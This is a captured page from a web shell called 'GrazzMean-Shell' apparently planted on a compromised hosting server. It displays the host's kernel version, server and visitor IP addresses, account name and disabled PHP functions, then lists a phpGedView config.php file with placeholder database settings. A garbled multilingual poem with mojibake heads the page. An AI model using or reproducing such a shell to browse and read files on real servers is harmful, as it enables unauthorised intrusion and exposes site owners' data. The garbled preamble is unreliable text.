曾与蒿藜同雨露,한때 잡초와 쑥과 함께 비와 이슬을 나누던 곳이 이제는 소나무와 삼나무와 함께 서리와 눈을 견뎌내고 있다.终随松柏到冰霜.かつては雑草やヨモギと共に雨や露を分かち合っていたが、今では松やヒノキと共に霜や雪に耐えている。曾与蒿藜同雨露,Once sharing rain and dew with weeds and wormwood, now enduring frost and snow with pines and cypresses.终随松柏到冰霜.曾与蒿藜同雨露한때 잡초와 쑥과 함께 비와 이슬을 나누던 곳이 이제는 소나무와 삼나무와 함께 서리와 눈을 견뎌내고 있다.,终随松柏到冰霜.譖セ荳手珍阯懷酔髮ィ髴イ�檎サ磯囂譚セ譟丞芦蜀ー髴�曾与蒿藜同雨露,鏇句笌钂胯棞鍚岄洦闇诧紝缁堥殢鏉炬煆鍒板啺闇�终随松柏到冰霜.曾与蒿藜同雨露,한때 잡초와 쑥과 함께 비와 이슬을 나누던 곳이 이제는 소나무와 삼나무와 함께 서리와 눈을 견뎌내고 있다.终随松柏到冰霜.曾与蒿藜同雨露,终随松柏到冰霜. rahbord-ins.ir - GrazzMean-Shell
shell bypass 403

GrazzMean-Shell Shell

: /var/softaculous/gedview/ [ drwxr-xr-x ]
Uname: Linux server18.dn-server.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
Software: LiteSpeed
PHP version: 7.4.33 [ PHP INFO ] PHP os: Linux
Server Ip: 185.126.202.122
Your Ip: 216.73.216.193
User: rahbordf (4876) | Group: rahbordf (4881)
Safe Mode: OFF
Disable Function:
show_source, system, shell_exec, passthru, exec, popen, proc_open

name : config.php
<?php
/**
 * Main configuration file required by all other files in PGV
 *
 * The variables in this file are the main configuration variable for the site
 * Gedcom specific configuration variables are stored in the config_gedcom.php file.
 * Site administrators may edit these settings online through the install.php file.
 *
 * phpGedView: Genealogy Viewer
 * Copyright (C) 2002 to 2009  PGV Development Team.  All rights reserved.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 *
 * @package PhpGedView
 * @subpackage Admin
 * @see install.php
 * @version $Id: config.dist 7054 2011-08-22 19:30:30Z canajun2eh $
 */

if (preg_match('/\Wconfig.php/', $_SERVER['SCRIPT_NAME'])>0) {
	print 'Got your hand caught in the cookie jar.';
	exit;
}

$DBTYPE='mysql'; //-- type of database to connect when using the PHP/PDO
$DBHOST='[[softdbhost]]'; //-- Host where MySQL database is kept
$DBPORT=''; //-- Database port, leave blank for default
$DBUSER='[[softdbuser]]'; //-- MySQL database User Name
$DBPASS='[[softdbpass]]'; //-- MySQL database User Password
$DBNAME='[[softdb]]'; //-- The MySQL database name where you want PHPGedView to build its tables
$DB_UTF8_COLLATION=false; //-- Use the database to sort/collation UTF8 text
$TBLPREFIX='[[dbprefix]]'; //-- prefix to include on table names
$INDEX_DIRECTORY='./index/'; //-- Readable and Writeable Directory to store index files (include the trailing "/")
$AUTHENTICATION_MODULE = "authentication.php";	//-- File that contains authentication functions
$PGV_STORE_MESSAGES=true; //-- allow messages sent to users to be stored in the PGV system
$PGV_SIMPLE_MAIL=true; //-- allow admins to set this so that they can override the name <emailaddress> combination in the emails
$USE_REGISTRATION_MODULE=true; //-- turn on the user self registration module
$REQUIRE_ADMIN_AUTH_REGISTRATION=true; //-- require an admin user to authorize a new registration before a user can login
$ALLOW_USER_THEMES=true; //-- Allow user to set their own theme
$ALLOW_CHANGE_GEDCOM=true; //-- A true value will provide a link in the footer to allow users to change the gedcom they are viewing
$LOGFILE_CREATE='monthly'; //-- set how often new log files are created, "none" turns logs off, "daily", "weekly", "monthly", "yearly"
$LOG_LANG_ERROR = false;						//-- Set if non-existing language variables should be written to a logfile
$PGV_SESSION_SAVE_PATH=''; //-- Path to save PHP session Files -- DO NOT MODIFY unless you know what you are doing
												//-- leaving it blank will use the default path for your php configuration as found in php.ini
$PGV_SESSION_TIME='7200'; //-- number of seconds to wait before an inactive session times out
$SERVER_URL=''; //-- the URL used to access this server
$LOGIN_URL=''; //-- the URL to use to go to the login page, use this value if you want to redirect to a different site when users login, useful for switching from http to https
$MAX_VIEWS='20'; //-- the maximum number of page views per xx seconds per session
$MAX_VIEW_TIME='1'; //-- the number of seconds in which the maximum number of views must not be reached
$PGV_MEMORY_LIMIT='32M'; //-- the maximum amount of memory that PGV should be allowed to consume
$COMMIT_COMMAND=''; //-- Choices are empty string, cvs or svn
$PGV_SMTP_ACTIVE=false; //-- Enable to use of SMTP to send external emails
$PGV_SMTP_HOST=''; //-- The domain name of the SMTP smarthost
$PGV_SMTP_HELO=''; //-- The local SMTP domain name
$PGV_SMTP_PORT='25'; //-- The port number talk to the SMTP smarthost
$PGV_SMTP_AUTH=false; //-- Enable the use of SMTP authorization
$PGV_SMTP_AUTH_USER=''; //-- User name for SMTP authorization
$PGV_SMTP_AUTH_PASS=''; //-- Password for SMTP authorization
$PGV_SMTP_SSL='none'; //-- Use SSL for SMTP authorization
$PGV_SMTP_FROM_NAME=''; //-- Sender name
$USE_GOOGLE_ANALYTICS=false; //-- Should this site link to Google Analytics server?
$PGV_GOOGLE_ANALYTICS=''; //-- This PGV site's Google Analytics account
$USE_PIWIK_ANALYTICS=false; //-- Should this site link to Piwik Analytics server?
$PGV_PIWIK_URL=''; //-- URL to Piwik Analytics server
$PGV_PIWIK_SITE=''; //-- This PGV site's site number on Piwik Analytics server
$USE_CLUSTRMAPS_ANALYTICS=false; //-- Should this site link to ClustrMaps Analytics server?
$PGV_CLUSTRMAPS_SITE=''; //-- This PGV site's URL, for use by ClustrMaps Analytics server
$PGV_CLUSTRMAPS_SERVER=''; //-- ClustrMaps server number assigned to handle your site's requests

$CONFIGURED=true; 
require_once './includes/session.php';
© 2026 GrazzMean-Shell